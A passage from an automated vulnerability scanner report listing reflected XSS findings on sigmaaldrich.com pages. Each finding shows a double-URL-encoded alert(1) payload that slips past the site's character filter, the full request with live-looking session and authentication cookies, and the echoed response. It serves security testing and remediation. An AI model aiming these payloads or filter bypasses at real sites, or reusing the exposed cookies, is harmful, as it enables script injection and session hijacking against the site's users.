Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/2a801";alert(1)//8a6f51f14da","E404") ;
   </script>
...[SNIP]...

1.19. http://www.sigmaaldrich.com/analytical-chromatography/labware-and-equipment.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/labware-and-equipment.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16eec%2522%253balert%25281%2529%252f%252f121212b1465 was submitted in the REST URL parameter 1. This input was echoed as 16eec";alert(1)//121212b1465 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography16eec%2522%253balert%25281%2529%252f%252f121212b1465/labware-and-equipment.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 28956
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography16eec";alert(1)//121212b1465/labware-and-equipment.html","E404") ;
   </script>
...[SNIP]...

1.20. http://www.sigmaaldrich.com/analytical-chromatography/labware-and-equipment.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/labware-and-equipment.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 234a0%2522%253balert%25281%2529%252f%252f9de4501c6b6 was submitted in the REST URL parameter 2. This input was echoed as 234a0";alert(1)//9de4501c6b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/234a0%2522%253balert%25281%2529%252f%252f9de4501c6b6 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:05 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/234a0";alert(1)//9de4501c6b6","E404") ;
   </script>
...[SNIP]...

1.21. http://www.sigmaaldrich.com/analytical-chromatography/microbiology.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/microbiology.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58baf%2522%253balert%25281%2529%252f%252fa81e6945943 was submitted in the REST URL parameter 1. This input was echoed as 58baf";alert(1)//a81e6945943 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography58baf%2522%253balert%25281%2529%252f%252fa81e6945943/microbiology.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:05 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography58baf";alert(1)//a81e6945943/microbiology.html","E404") ;
   </script>
...[SNIP]...

1.22. http://www.sigmaaldrich.com/analytical-chromatography/microbiology.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/microbiology.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9439c%2522%253balert%25281%2529%252f%252fd5a28f4e792 was submitted in the REST URL parameter 2. This input was echoed as 9439c";alert(1)//d5a28f4e792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/9439c%2522%253balert%25281%2529%252f%252fd5a28f4e792 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/9439c";alert(1)//d5a28f4e792","E404") ;
   </script>
...[SNIP]...

1.23. http://www.sigmaaldrich.com/analytical-chromatography/posters-and-cds.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/posters-and-cds.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14c7d%2522%253balert%25281%2529%252f%252fe3ac5dd71b4 was submitted in the REST URL parameter 1. This input was echoed as 14c7d";alert(1)//e3ac5dd71b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography14c7d%2522%253balert%25281%2529%252f%252fe3ac5dd71b4/posters-and-cds.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:18 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography14c7d";alert(1)//e3ac5dd71b4/posters-and-cds.html","E404") ;
   </script>
...[SNIP]...

1.24. http://www.sigmaaldrich.com/analytical-chromatography/posters-and-cds.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/posters-and-cds.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81ff0%2522%253balert%25281%2529%252f%252fb80a4680748 was submitted in the REST URL parameter 2. This input was echoed as 81ff0";alert(1)//b80a4680748 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

